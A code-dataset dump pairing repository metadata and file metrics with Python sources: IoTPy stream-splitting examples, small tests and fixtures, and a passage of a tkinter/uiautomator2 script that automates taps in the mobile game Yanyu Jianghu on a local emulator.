| 18 | 35 | 0.861111 | 5 | 36 | 6 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.111111 | 36 | 1 | 36 | 36 | 0.9375 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
b7047238047c54eb5c35b5180b9b365e14791bc1 | 41 | py | Python | src/.py/rgb/test.py | TED-996/krait-rgb | 44b60400bda2624265d3ec72a1a12a31e1bf036c | [
"MIT"
] | null | null | null | src/.py/rgb/test.py | TED-996/krait-rgb | 44b60400bda2624265d3ec72a1a12a31e1bf036c | [
"MIT"
] | null | null | null | src/.py/rgb/test.py | TED-996/krait-rgb | 44b60400bda2624265d3ec72a1a12a31e1bf036c | [
"MIT"
] | null | null | null | import cycle
import sys
print(sys.argv) | 8.2 | 15 | 0.780488 | 7 | 41 | 4.571429 | 0.714286 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.146341 | 41 | 5 | 15 | 8.2 | 0.914286 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.666667 | 0 | 0.666667 | 0.333333 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
b73f6cc840cf79e1051922f68d09633f2afe6f79 | 25 | py | Python | manipulation_main/agents/__init__.py | ama29/6.843-Final-Project | cc0628f32cd695e0a76ffb0b7daa8c7350b6f0ed | [
"MIT"
] | 75 | 2020-10-24T06:32:55.000Z | 2022-03-26T07:44:49.000Z | manipulation_main/agents/__init__.py | ama29/6.843-Final-Project | cc0628f32cd695e0a76ffb0b7daa8c7350b6f0ed | [
"MIT"
] | 12 | 2021-03-21T06:19:00.000Z | 2022-03-31T13:39:34.000Z | manipulation_main/agents/__init__.py | ama29/6.843-Final-Project | cc0628f32cd695e0a76ffb0b7daa8c7350b6f0ed | [
"MIT"
] | 27 | 2020-12-30T12:49:46.000Z | 2022-03-17T16:10:02.000Z |
from .agent import Agent | 12.5 | 24 | 0.8 | 4 | 25 | 5 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.16 | 25 | 2 | 24 | 12.5 | 0.952381 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
b7619a9fca12d3248d6f23cab82e91353d3db008 | 14,535 | py | Python | examples/split/examples_split.py | sdeepaknarayanan/IoTPy | ba022c3d6696527b834a865b9cf403d90665145b | [
"BSD-3-Clause"
] | 3 | 2019-08-15T19:36:54.000Z | 2020-05-27T05:50:42.000Z | examples/split/examples_split.py | sdeepaknarayanan/IoTPy | ba022c3d6696527b834a865b9cf403d90665145b | [
"BSD-3-Clause"
] | 2 | 2020-05-29T19:34:39.000Z | 2020-06-12T19:42:05.000Z | examples/split/examples_split.py | sdeepaknarayanan/IoTPy | ba022c3d6696527b834a865b9cf403d90665145b | [
"BSD-3-Clause"
] | null | null | null | """
This module has examples of splitting a stream
into multiple streams.
"""
import sys
sys.path.append("../../IoTPy/helper_functions")
sys.path.append("../../IoTPy/core")
sys.path.append("../../IoTPy/agent_types")
# stream, helper_control are in IoTPy/IoTPy/core
from stream import Stream, run
from helper_control import _no_value, _multivalue
# recent_values is in IoTPy/IoTPy/helper_functions
from recent_values import recent_values
# split, basics are in IoTPy/IoTPy/agent_types
from split import split_element, split_window
from split import split_element_f, split_window_f
from basics import split_e, split_w, fsplit_2e, fsplit_2w
def examples():
#----------------------------------------------
# EXAMPLE: SIMPLE SPLIT
# Split a stream into a list of streams. In this
# example, a stream (s) is split into two streams:
# u and v.
# Decorate a conventional function to get a
# stream function. This function returns a list
# of two values corresponding to the two output
# streams.
@split_e
def h(x):
return [2*x, x+1000]
# Create streams.
s = Stream()
u = Stream()
v = Stream()
# Create agents by calling the decorated function.
h(s, [u,v])
# Put data into input streams.
DATA = list(range(5))
s.extend(DATA)
# Run the agents.
run()
# Check values of output streams.
assert recent_values(u) == [2*x for x in DATA]
assert recent_values(v) == [x+1000 for x in DATA]
#----------------------------------------------
# EXAMPLE: SPLIT WITH KEYWORD ARGUMENT
# Split a stream into a list of streams. Use
# a keyword argument in the splitting function.
# Decorate a conventional function to get a
# stream function. This function returns a list
# of two values corresponding to the two output
# streams. addend is a keyword argument in the
# function that creates agents.
@split_e
def h(x, addend):
return [x+addend, x+1000+addend]
# Create streams.
s = Stream()
u = Stream()
v = Stream()
# Call decorated function.
ADDEND=10
h(s, [u,v], addend=ADDEND)
# Put data into input streams.
s.extend(DATA)
# Run the decorated function.
run()
# Check values of output streams.
assert recent_values(u) == [x+ADDEND for x in DATA]
assert recent_values(v) == [x+1000+ADDEND for x in DATA]
#----------------------------------------------
# EXAMPLE: SPLIT WITH KEYWORD ARGUMENT AND STATE
# Split a stream into a list of streams, with
# a keyword argument and state.
# Decorate a conventional function to get a
# stream function. addend and multiplicand are
# keyword arguments used in the call to create
# agents. The function h returns 2 values:
# (1) a list of two numbers corresponding to the
# two output streams and
# (2) the next state.
@split_e
def h(v, state, addend, multiplicand):
next_state = state + 2
return ([v+addend+state, v*multiplicand+state],
next_state)
# Create streams.
s = Stream()
u = Stream()
v = Stream()
# Call decorated function to create agents. The initial state
# is 0. Include keyword arguments in the call.
ADDEND = 10
MULTIPLICAND = 2
h(s, [u,v], state=0, addend=ADDEND, multiplicand=MULTIPLICAND)
# Put data into input streams.
s.extend(DATA)
# Run the agent.
run()
# Check values of output streams.
assert recent_values(u) == [10, 13, 16, 19, 22]
assert recent_values(v) == [0, 4, 8, 12, 16]
#----------------------------------------------
# EXAMPLE: SPLIT WITH STATE AND NO KEYWORD ARGUMENTS
# Split a stream into a list of streams, with
# a state.
# Decorate a conventional function to get a
# stream function. This function returns two values
# a list and the next state, where the list has two
# values with one value for each output streams.
@split_e
def h(v, state):
next_state = state + 1
return [v+state, v+1000+state], next_state
# Create streams.
s = Stream()
u = Stream()
v = Stream()
# Call decorated function to create agents.
h(in_stream=s, out_streams=[u,v], state=0)
# Put data into input streams.
s.extend(DATA)
# Run the decorated function.
run()
# Check values of output streams.
assert recent_values(u) == [0, 2, 4, 6, 8]
assert recent_values(v) == [1000, 1002, 1004, 1006, 1008]
#----------------------------------------------
# EXAMPLE: SPLIT USING FUNCTIONAL FORM FOR
# SPLITTING A STREAM INTO 2 STREAMS.
# Split a stream into exactly two streams.
# This is in functional form, i.e. it creates
# and returns two streams.
# Decorate a conventional function to get a
# stream function.
@fsplit_2e
def h(v):
return [v, v+1000]
# Create streams.
s = Stream()
# Call decorated function to create agents
# Note that h creates streams u, v. It creates
# 2 streams because the decorator is fsplit_2e
u, v = h(s)
# Put data into input streams.
s.extend(DATA)
# Run the decorated function.
run()
# Check values of output streams.
assert recent_values(u) == DATA
assert recent_values(v) == [1000+x for x in DATA]
#----------------------------------------------
# EXAMPLE: SPLIT USING FUNCTIONAL FORM FOR
# SPLITTING A STREAM INTO 2 STREAMS.
# Split a stream into exactly two streams, with a
# keyword argument. This is in functional
# form, i.e. it creates and returns two streams.
# Decorate a conventional function to get a
# stream function.
@fsplit_2e
def h(v, addend):
return [v+addend, v+1000+addend]
# Create streams.
s = Stream()
# Call decorated function to create agents. Note
# functional form.
u, v = h(s, addend=10)
# Put data into input streams.
s.extend(DATA)
# Run the agents.
run()
# Check values of output streams.
assert recent_values(u) == [10, 11, 12, 13, 14]
assert recent_values(v) == [1010, 1011, 1012, 1013, 1014]
#----------------------------------------------
# EXAMPLE: FUNCTIONAL FORM
# Split a stream into exactly two streams, with a
# state and keyword argument. This is in functional
# form, i.e. it creates and returns two streams.
# Decorate a conventional function to get a
# stream function.
@fsplit_2e
def h(v, state, addend):
next_state = state + 1
return ([v+addend+state, v+1000+addend+state],
next_state)
# Create streams.
s = Stream()
# Call decorated function.
u, v = h(s, state=0, addend=10)
# Put data into input streams.
s.extend(list(range(5)))
# Run the decorated function.
run()
# Check values of output streams.
assert recent_values(u) == [10, 12, 14, 16, 18]
assert recent_values(v) == [1010, 1012, 1014, 1016, 1018]
#----------------------------------------------
# Split a stream into exactly two streams, with a
# state. This is in functional form,
# i.e. it creates and returns two streams.
# Decorate a conventional function to get a
# stream function.
@fsplit_2e
def hk(v, state):
next_state = state + 1
return [v+state, v+1000+state], next_state
# Create streams.
s = Stream()
# Call decorated function.
u, v = h(s, state=0, addend=10)
u, v = hk(s, state=0)
# Put data into input streams.
s.extend(list(range(5)))
# Run the decorated function.
run()
# Check values of output streams.
assert recent_values(u) == [0, 2, 4, 6, 8]
assert recent_values(v) == [1000, 1002, 1004, 1006, 1008]
#----------------------------------------------
# Split a stream into a list of streams.
# Window operation
# Decorate a conventional function to get a
# stream function.
@split_w
def h(window):
return [sum(window), max(window)]
# Create streams.
s = Stream()
u = Stream()
v = Stream()
# Call decorated function.
h(s, [u,v], window_size=3, step_size=2)
# Put data into input streams.
s.extend(list(range(12)))
# Run the decorated function.
run()
# Check values of output streams.
assert recent_values(u) == [3, 9, 15, 21, 27]
assert recent_values(v) == [2, 4, 6, 8, 10]
#----------------------------------------------
# Split a stream into a list of streams with
# keyword argument. Window operation
# Decorate a conventional function to get a
# stream function.
@split_w
def h(window, addend):
return [sum(window)+addend, max(window)+addend]
# Create streams.
s = Stream()
u = Stream()
v = Stream()
# Call decorated function to create agents.
h(s, [u,v], window_size=3, step_size=2, addend=1000)
# Put data into input streams.
s.extend(list(range(12)))
# Run the agents.
run()
# Check values of output streams.
assert recent_values(u) == [1003, 1009, 1015, 1021, 1027]
assert recent_values(v) == [1002, 1004, 1006, 1008, 1010]
#----------------------------------------------
# Split a stream into a list of streams with state and
# keyword argument. Window operation
# Decorate a conventional function to get a
# stream function.
@split_w
def h(window, state, addend):
next_state = state + 1
return ([sum(window)+addend+state,
max(window)+addend+state], next_state)
# Create streams.
s = Stream()
u = Stream()
v = Stream()
# Call decorated function.
h(s, [u,v], window_size=3, step_size=2, state=0, addend=1000)
# Put data into input streams.
s.extend(list(range(12)))
# Run the decorated function.
run()
# Check values of output streams.
assert recent_values(u) == [1003, 1010, 1017, 1024, 1031]
assert recent_values(v) == [1002, 1005, 1008, 1011, 1014]
#----------------------------------------------
# SPLITTING WITH WINDOWS
#----------------------------------------------
# EXAMPLE
# Split a stream into a list of streams with state.
# Window operation
# Decorate a conventional function to get a
# stream function. The first argument of the function
# is a list, i.e., the window. The function returns
# two values: a list and the next state where the list
# has one item for eah output stream.
@split_w
def h(window, state):
next_state = state + 1
return [sum(window)+state, max(window)+state], next_state
# Create streams.
s = Stream()
u = Stream()
v = Stream()
# Call decorated function to create agents.
h(s, [u,v], window_size=3, step_size=2, state=0)
# Put data into input streams.
s.extend(list(range(12)))
# Run the agents.
run()
# Check values of output streams.
assert recent_values(u) == [3, 10, 17, 24, 31]
assert recent_values(v) == [2, 5, 8, 11, 14]
#----------------------------------------------
# Split a stream into exactly TWO streams.
# WINDOW operation
# Decorate a conventional function to get a
# stream function. This is in functional form,
# i.e. it creates and returns a list of streams.
@fsplit_2w
def h(window):
return sum(window), max(window)
# Create streams.
s = Stream()
# Call decorated function. This function
# creates and returns two streams.
u, v = h(s, window_size=3, step_size=2)
# Put data into input streams.
s.extend(list(range(12)))
# Run the decorated function.
run()
# Check values of output streams.
assert recent_values(u) == [3, 9, 15, 21, 27]
assert recent_values(v) == [2, 4, 6, 8, 10]
#----------------------------------------------
# Split a stream into exactly two streams with
# keyword argument. Window operation
# Decorate a conventional function to get a
# stream function. This is in functional form,
# i.e. it creates and returns two streams.
@fsplit_2w
def h(window, addend):
return sum(window)+addend, max(window)+addend*2
# Create streams.
s = Stream()
# Call decorated function. This function
# creates and returns two streams.
u, v = h(s, window_size=3, step_size=2, addend=1000)
# Put data into input streams.
s.extend(list(range(12)))
# Run the decorated function.
run()
# Check values of output streams.
assert recent_values(u) == [1003, 1009, 1015, 1021, 1027]
assert recent_values(v) == [2002, 2004, 2006, 2008, 2010]
#----------------------------------------------
# Split a stream into exactly two streams with
# state and keyword argument. Window operation
# Decorate a conventional function to get a
# stream function. This is in functional form,
# i.e. it creates and returns two streams.
@fsplit_2w
def h(window, state, addend):
next_state = state + 1
return ([sum(window)+addend+state,
max(window)+addend*2-state], next_state)
# Create streams.
s = Stream()
# Call decorated function. This function
# creates and returns two streams.
u, v = h(s, window_size=3, step_size=2,
state=0, addend=1000)
# Put data into input streams.
s.extend(list(range(12)))
# Run the decorated function.
run()
# Check values of output streams.
assert recent_values(u) == [1003, 1010, 1017, 1024, 1031]
assert recent_values(v) == [2002, 2003, 2004, 2005, 2006]
#----------------------------------------------
# Split a stream into exactly two streams with
# state. Window operation
# Decorate a conventional function to get a
# stream function. This is in functional form,
# i.e. it creates and returns two streams.
@fsplit_2w
def h(window, state):
next_state = state + 1
return [sum(window)+state, max(window)-state], next_state
# Create streams.
s = Stream()
# Call decorated function. This function
# creates and returns two streams.
u, v = h(s, window_size=3, step_size=2, state=0)
# Put data into input streams.
s.extend(list(range(12)))
# Run the decorated function.
run()
# Check values of output streams.
assert recent_values(u) == [3, 10, 17, 24, 31]
assert recent_values(v) == [2, 3, 4, 5, 6]
if __name__ == '__main__':
examples()
| 31.875 | 66 | 0.598074 | 1,979 | 14,535 | 4.335523 | 0.085902 | 0.029371 | 0.067133 | 0.029837 | 0.827389 | 0.793124 | 0.775641 | 0.768881 | 0.75338 | 0.734732 | 0 | 0.044772 | 0.253182 | 14,535 | 455 | 67 | 31.945055 | 0.745647 | 0.500172 | 0 | 0.623037 | 0 | 0 | 0.01064 | 0.007235 | 0 | 0 | 0 | 0 | 0.167539 | 1 | 0.089005 | false | 0 | 0.036649 | 0.041885 | 0.209424 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
b793b39c8a1eb4956fb8ddf421039cc4900574f3 | 41 | py | Python | src/visualization/__init__.py | daniellepaynter/snapshot_pilot | 6d678760f3d382dbdd640ff42ebb6dde38cfb77c | [
"MIT"
] | null | null | null | src/visualization/__init__.py | daniellepaynter/snapshot_pilot | 6d678760f3d382dbdd640ff42ebb6dde38cfb77c | [
"MIT"
] | null | null | null | src/visualization/__init__.py | daniellepaynter/snapshot_pilot | 6d678760f3d382dbdd640ff42ebb6dde38cfb77c | [
"MIT"
] | null | null | null | from .snapshotpilot_dataproc_mod import * | 41 | 41 | 0.878049 | 5 | 41 | 6.8 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.073171 | 41 | 1 | 41 | 41 | 0.894737 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
b7c274fe091609362612060ecfa9975e4209b566 | 149 | py | Python | authors/apps/orders/admin.py | hoslack/jua-kali_Backend | e0e92aa0287c4a17b303fdde941f457b28c51223 | [
"BSD-3-Clause"
] | null | null | null | authors/apps/orders/admin.py | hoslack/jua-kali_Backend | e0e92aa0287c4a17b303fdde941f457b28c51223 | [
"BSD-3-Clause"
] | 3 | 2020-06-05T19:27:45.000Z | 2021-06-10T20:59:41.000Z | authors/apps/orders/admin.py | hoslack/jua-kali_Backend | e0e92aa0287c4a17b303fdde941f457b28c51223 | [
"BSD-3-Clause"
] | null | null | null | from django.contrib import admin
from .models import Order
class AuthorAdmin(admin.ModelAdmin):
pass
admin.site.register(Order, AuthorAdmin)
| 14.9 | 39 | 0.785235 | 19 | 149 | 6.157895 | 0.684211 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.14094 | 149 | 9 | 40 | 16.555556 | 0.914063 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.2 | 0.4 | 0 | 0.6 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 6 |
4d3377026e00d02f5d5ae8f9712f2aa5cf6626fd | 18 | py | Python | efp/__init__.py | cmptrgeekken/eve-fit-parser | 72f337a56b92f7dafbdff65ff1d53a5a33993fb7 | [
"MIT"
] | null | null | null | efp/__init__.py | cmptrgeekken/eve-fit-parser | 72f337a56b92f7dafbdff65ff1d53a5a33993fb7 | [
"MIT"
] | null | null | null | efp/__init__.py | cmptrgeekken/eve-fit-parser | 72f337a56b92f7dafbdff65ff1d53a5a33993fb7 | [
"MIT"
] | null | null | null | from .efp import * | 18 | 18 | 0.722222 | 3 | 18 | 4.333333 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.166667 | 18 | 1 | 18 | 18 | 0.866667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
4d38c08dd4dfcdabf1ae918263c6df6e7b228f1a | 25 | py | Python | async_translate/providers/deepl/__init__.py | Memotic/async-translate | 062166dbd0adfd19538b8b040dac5860bb821db1 | [
"MIT"
] | 4 | 2020-10-05T03:06:20.000Z | 2022-03-01T21:47:21.000Z | async_translate/providers/deepl/__init__.py | Memotic/async-translate | 062166dbd0adfd19538b8b040dac5860bb821db1 | [
"MIT"
] | 2 | 2020-10-05T03:09:40.000Z | 2022-03-12T20:12:49.000Z | async_translate/providers/deepl/__init__.py | Memotic/async-translate | 062166dbd0adfd19538b8b040dac5860bb821db1 | [
"MIT"
] | 2 | 2020-09-25T01:50:26.000Z | 2022-01-28T20:54:48.000Z | from .deepl import DeepL
| 12.5 | 24 | 0.8 | 4 | 25 | 5 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.16 | 25 | 1 | 25 | 25 | 0.952381 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
4d39bc33cb91646cbd806896f2806fa47069bd5a | 473 | py | Python | tests/fixtures_transforms.py | kristianeschenburg/mantarray-waveform-analysis | a18ef19388cfdc271df208835ebf0d7ffc547ac3 | [
"MIT"
] | null | null | null | tests/fixtures_transforms.py | kristianeschenburg/mantarray-waveform-analysis | a18ef19388cfdc271df208835ebf0d7ffc547ac3 | [
"MIT"
] | 87 | 2020-08-17T19:38:20.000Z | 2022-02-18T02:03:54.000Z | tests/fixtures_transforms.py | kristianeschenburg/mantarray-waveform-analysis | a18ef19388cfdc271df208835ebf0d7ffc547ac3 | [
"MIT"
] | 1 | 2021-07-01T16:48:50.000Z | 2021-07-01T16:48:50.000Z | # -*- coding: utf-8 -*-
"""Fixtures for testing the transforms."""
from mantarray_waveform_analysis import BESSEL_LOWPASS_10_UUID
from mantarray_waveform_analysis import CENTIMILLISECONDS_PER_SECOND
from mantarray_waveform_analysis import create_filter
import pytest
@pytest.fixture(scope="session", name="bessel_lowpass_10_for_100hz")
def fixture_bessel_lowpass_10_for_100hz():
return create_filter(BESSEL_LOWPASS_10_UUID, (1 / 100) * CENTIMILLISECONDS_PER_SECOND)
| 36.384615 | 90 | 0.832981 | 63 | 473 | 5.825397 | 0.507937 | 0.141689 | 0.163488 | 0.237057 | 0.411444 | 0 | 0 | 0 | 0 | 0 | 0 | 0.044084 | 0.088795 | 473 | 12 | 91 | 39.416667 | 0.807425 | 0.124736 | 0 | 0 | 0 | 0 | 0.083333 | 0.066176 | 0 | 0 | 0 | 0 | 0 | 1 | 0.142857 | true | 0.571429 | 0.571429 | 0.142857 | 0.857143 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 6 |
4d98de4b60dd7926ef6aba77afe571d3851a873a | 323 | py | Python | Codewars/7kyu/find-all-pairs-1/Python/test.py | RevansChen/online-judge | ad1b07fee7bd3c49418becccda904e17505f3018 | [
"MIT"
] | 7 | 2017-09-20T16:40:39.000Z | 2021-08-31T18:15:08.000Z | Codewars/7kyu/find-all-pairs-1/Python/test.py | RevansChen/online-judge | ad1b07fee7bd3c49418becccda904e17505f3018 | [
"MIT"
] | null | null | null | Codewars/7kyu/find-all-pairs-1/Python/test.py | RevansChen/online-judge | ad1b07fee7bd3c49418becccda904e17505f3018 | [
"MIT"
] | null | null | null | # Python - 3.6.0
test.assert_equals(duplicates([1, 2, 5, 6, 5, 2]) , 2)
test.assert_equals(duplicates([1, 2, 2, 20, 6, 20, 2, 6, 2]), 4)
test.assert_equals(duplicates([0, 0, 0, 0, 0, 0, 0]) , 3)
test.assert_equals(duplicates([1000, 1000]), 1)
test.assert_equals(duplicates([]), 0)
test.assert_equals(duplicates([54]), 0)
| 32.3 | 64 | 0.653251 | 59 | 323 | 3.474576 | 0.254237 | 0.292683 | 0.468293 | 0.760976 | 0.697561 | 0.307317 | 0 | 0 | 0 | 0 | 0 | 0.151943 | 0.123839 | 323 | 9 | 65 | 35.888889 | 0.572438 | 0.043344 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | true | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
4db08bc270d7b8273bb5e06b65261bc03c05c89a | 15,874 | py | Python | YanyuAutoScript/gui.py | HYLnP/YanyuAutoScript | 6eed69bcf599a38e91bcf0809371b34cb9ce97e7 | [
"MIT"
] | 4 | 2021-11-24T12:22:04.000Z | 2022-03-09T07:54:34.000Z | YanyuAutoScript/gui.py | HYLnP/YanyuAutoScript | 6eed69bcf599a38e91bcf0809371b34cb9ce97e7 | [
"MIT"
] | null | null | null | YanyuAutoScript/gui.py | HYLnP/YanyuAutoScript | 6eed69bcf599a38e91bcf0809371b34cb9ce97e7 | [
"MIT"
] | 1 | 2022-03-09T07:54:36.000Z | 2022-03-09T07:54:36.000Z | # -*- coding:utf-8 -*-
# 用户:HYL
# 日期:2021年11月17日
import time
from tkinter import Tk, Button
import threading
import uiautomator2 as u2
print('欢迎使用烟雨江湖脚本,本脚本禁止商用。')
print("初始位置在泰山马车处,需要有马车票,使用前请先检查是否有马车票")
class MainWindow(Tk):
"""继承Tk,实例化窗口"""
def __init__(self):
super().__init__()
self.title('烟雨江湖脚本')
self.geometry('300x300+20+20')
print('初始化脚本界面')
self.main_event()
print('连接模拟器')
self.device = u2.connect('127.0.0.1:5555')
print('连接成功')
print('-------------------------------------------------------------------')
def main_event(self):
"""事件主体"""
btn1 = Button(self, text='塞北刷怪', command=lambda: MainWindow.thread_it(self.sai_bei))
btn1.place(x=20, y=100)
btn2 = Button(self, text='燕王阁3次', command=lambda: MainWindow.thread_it(self.yan_wang))
btn2.place(x=100, y=100)
btn3 = Button(self, text='枯骨门1次', command=lambda: MainWindow.thread_it(self.ku_gu))
btn3.place(x=180, y=100)
btn4 = Button(self, text='天一教1次', command=lambda: MainWindow.thread_it(self.tian_yi))
btn4.place(x=20, y=200)
btn5 = Button(self, text='铁刃门1次', command=lambda: MainWindow.thread_it(self.tie_ren))
btn5.place(x=100, y=200)
btn5 = Button(self, text='一键运行所有', command=lambda: MainWindow.thread_it(self.yi_jian))
btn5.place(x=180, y=200)
def sai_bei(self):
"""塞北刷怪"""
print('泰山到塞北')
self.device.click(0.214, 0.95)
time.sleep(2)
self.device.click(0.312, 0.819)
time.sleep(2)
self.device.click(0.362, 0.12)
time.sleep(5)
self.device.click(0.224, 0.372)
time.sleep(5)
self.device.click(0.096, 0.585)
time.sleep(6)
self.device.click(0.43, 0.471)
time.sleep(6)
self.device.click(0.268, 0.634)
time.sleep(6)
self.device.click(0.432, 0.468)
time.sleep(6)
self.device.click(0.108, 0.769)
time.sleep(6)
self.device.click(0.21, 0.393)
time.sleep(6)
print('开始刷怪')
for i in range(10):
self.device.click(0.378, 0.436)
time.sleep(5)
self.device.click(0.548, 0.691)
time.sleep(5)
self.device.click(0.712, 0.347)
time.sleep(5)
self.device.click(0.38, 0.741)
time.sleep(5)
self.device.click(0.662, 0.489)
time.sleep(5)
self.device.click(0.09, 0.691)
time.sleep(5)
self.device.click(0.258, 0.209)
time.sleep(5)
print('回到泰山')
self.device.click(0.258, 0.209)
time.sleep(5)
self.device.click(0.198, 0.957)
time.sleep(3)
self.device.click(0.274, 0.804)
time.sleep(3)
self.device.click(0.742, 0.609)
time.sleep(3)
self.device.click(0.592, 0.861)
time.sleep(10)
print('刷野完成')
def yan_wang(self):
print("""泰山到幽州""")
self.device.click(0.204, 0.946)
time.sleep(2)
self.device.click(0.296, 0.822)
time.sleep(2)
self.device.click(0.58, 0.294)
time.sleep(2)
self.device.click(0.432, 0.549)
time.sleep(8)
print("""走到副本前面""")
self.device.click(0.672, 0.797)
time.sleep(5)
self.device.click(0.212, 0.776)
time.sleep(5)
self.device.click(0.658, 0.691)
time.sleep(5)
self.device.click(0.688, 0.691)
time.sleep(5)
self.device.click(0.734, 0.748)
time.sleep(5)
self.device.click(0.736, 0.755)
time.sleep(5)
self.device.click(0.552, 0.595)
time.sleep(5)
print("""第一次与士兵对话""")
self.device.click(0.924, 0.539)
time.sleep(5)
self.device.click(0.6, 0.436)
time.sleep(5)
self.device.click(0.596, 0.421)
time.sleep(5)
self.device.click(0.646, 0.439)
time.sleep(12)
print("""进入副本打怪""")
self.device.click(0.66, 0.804)
time.sleep(5)
self.device.click(0.774, 0.585)
time.sleep(5)
self.device.click(0.718, 0.223)
time.sleep(5)
self.device.click(0.712, 0.219)
time.sleep(5)
self.device.click(0.6, 0.248)
time.sleep(5)
self.device.click(0.606, 0.436)
time.sleep(5)
self.device.click(0.708, 0.439)
time.sleep(5)
self.device.click(0.368, 0.237)
time.sleep(5)
self.device.click(0.264, 0.241)
time.sleep(5)
self.device.click(0.152, 0.138)
time.sleep(5)
self.device.click(0.484, 0.234)
time.sleep(5)
self.device.click(0.608, 0.358)
time.sleep(5)
self.device.click(0.44, 0.475)
time.sleep(5)
self.device.click(0.496, 0.542)
time.sleep(5)
self.device.click(0.486, 0.443)
time.sleep(5)
self.device.click(0.384, 0.535)
time.sleep(5)
self.device.click(0.438, 0.471)
time.sleep(5)
self.device.click(0.328, 0.39)
time.sleep(5)
self.device.click(0.602, 0.446)
time.sleep(12)
# -------------------------------------
print("""第二次与士兵对话""")
self.device.click(0.544, 0.588) # 走过去
time.sleep(5)
self.device.click(0.918, 0.542)
time.sleep(5)
self.device.click(0.61, 0.432)
time.sleep(5)
self.device.click(0.608, 0.425)
time.sleep(5)
self.device.click(0.608, 0.425)
time.sleep(5)
self.device.click(0.608, 0.425)
time.sleep(5)
self.device.click(0.608, 0.425)
time.sleep(12)
print("""进入副本打怪""")
self.device.click(0.66, 0.804)
time.sleep(5)
